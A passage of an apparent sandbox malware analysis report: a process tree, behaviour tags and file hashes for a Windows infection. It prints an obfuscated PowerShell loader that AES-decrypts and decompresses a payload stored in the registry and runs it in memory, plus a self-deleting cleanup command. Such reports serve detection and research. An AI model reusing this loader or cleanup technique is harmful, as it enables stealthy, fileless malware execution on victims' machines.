[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vIu/qtGS/x2SF+sMWSvDow==');$KjvsN = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN, 0, $KjvsN.Length);$KjvsN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN);$plOkO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NRF7C23+0Byt9JP09Qn3+DY9RWuWXg3qOZ5asN5y0ws=');$plOkO = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($plOkO, 0, $plOkO.Length);$plOkO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($plOkO);$BdVPD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YazMmludb1vvXcZAwlnHtw==');$BdVPD = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdVPD, 0, $BdVPD.Length);$BdVPD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdVPD);$Khvbp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zf4gu7ZD/I0b6kn1xVw/lUgWPK+5TZfCSPo5/VhvOXuI85jnbHRoOd2fBY8oxjU26aXQHO2B52J1YA7TfWY3FWExstcJfnODtZBebrQGClVdHebcL2OSattonC3hU321X5S9joWtE4fv8lvmwXH8ZSMbOMFWFESDoOJt+1Bt/H4EOblhpHmooz9fO/Z0BQMWnBbu2ar5V+hEHCESz43Kaxu4hmpzzDEJu+AmLCnK5LBUY45S1drr3J7exCZSxUHJyRziq1L3pwqUI84KLwjoW/k6C5j/KY3rneb2ZEWz9plzz8jRvwboouGn1UIfaUeaBMH1+0BvjxLP3r34OlMXRA5fmStXzraQt7JAdtXUP8wXRdqcOKUQtp52SelQ6J0WjdGAtsvRvQubLio0A+mNT6WMINjpxOSFgujINR8XOic=');$Khvbp = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Khvbp, 0, $Khvbp.Length);$Khvbp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Khvbp);$OawVc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtBl8RDMM8q8D+f38cUwlQ==');$OawVc = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OawVc, 0, $OawVc.Length);$OawVc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OawVc);$FBZIn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vWt5Q/a84rfnuBa3yHiejA==');$FBZIn = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FBZIn, 0, $FBZIn.Length);$FBZIn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FBZIn);$AkiHH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UavpIk4tpnHdD1kgrI4R2w==');$AkiHH = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AkiHH, 0, $AkiHH.Length);$AkiHH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AkiHH);$fIDaQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFB5V6XdocehcH6idKuJ0w==');$fIDaQ = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fIDaQ, 0, $fIDaQ.Length);$fIDaQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fIDaQ);$HMBte = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzQvJLBl0kmxaMejxpYmTA==');$HMBte = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HMBte, 0, $HMBte.Length);$HMBte = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HMBte);$KjvsN0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8D3dfobAIMj6AYpSV1togQ==');$KjvsN0 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN0, 0, $KjvsN0.Length);$KjvsN0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN0);$KjvsN1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1bVhrF128/BjmNUc1iFP/g==');$KjvsN1 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN1, 0, $KjvsN1.Length);$KjvsN1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN1);$KjvsN2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NKOjM2E+a4FkOdDaJJVE3w==');$KjvsN2 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN2, 0, $KjvsN2.Length);$KjvsN2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN2);$KjvsN3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oWIK372gtRppDGwBPsAgnQ==');$KjvsN3 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN3, 0, $KjvsN3.Length);$KjvsN3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN3);$bDukH.Dispose();$OmgWn1.Dispose();if (@(get-process -ea silentlycontinue $KjvsN3).count -gt 1) {exit};$FrMqe = [Microsoft.Win32.Registry]::$fIDaQ.$AkiHH($KjvsN).$FBZIn($plOkO);$zSvhR=[string[]]$FrMqe.Split('\');$Odjii=FpgXf(qMEAm([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[1])));qYOzs $Odjii (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$SQOFS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[0]);$OmgWn = New-Object System.Security.Cryptography.AesManaged;$OmgWn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bzdRW = $OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')();$SQOFS = $bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SQOFS, 0, $SQOFS.Length);$bzdRW.Dispose();$OmgWn.Dispose();$ACvdD = New-Object System.IO.MemoryStream(, $SQOFS);$fxSDY = New-Object System.IO.MemoryStream;$sioSc = New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::$KjvsN1);$sioSc.$HMBte($fxSDY);$sioSc.Dispose();$ACvdD.Dispose();$fxSDY.Dispose();$SQOFS = $fxSDY.ToArray();$gZCIb = $Khvbp | IEX;$uGEfN = $gZCIb::$KjvsN2($SQOFS);$lPQfD = $uGEfN.EntryPoint;$lPQfD.$KjvsN0($null, (, [string[]] ($BdVPD)))7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe"6⤵PID:4876
-
C:\Windows\system32\PING.EXEPING localhost -n 87⤵
- Runs ping.exe
PID:2312
-
-
-
-
-
-
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2376
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2280
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2088
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1384
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:540
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 428 -p 3428 -ip 34281⤵PID:2712
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 3520 -ip 35201⤵PID:4968
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3520 -s 9721⤵
- Program crash
PID:2264
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3428 -s 3921⤵
- Program crash
PID:1356
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
15.5MB
MD5005d53e359262bcbfa0506bae121267a
SHA1caeb1c9390f33424442ba26a6f251faf6926d7ec
SHA256f6bee54ceabc6e2afa2b5056b94f71d2e766d5a340fc4245e421f887ea75fb52
SHA5128cadc53ac3ad7c82d0b6be0c46a88df9301eb6c21f5f7da1b6ab51fa58e0ac5ed44545991b3157dcd8f27db39d5c8abd50e56929c29e7190863c73c81ac640d6
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11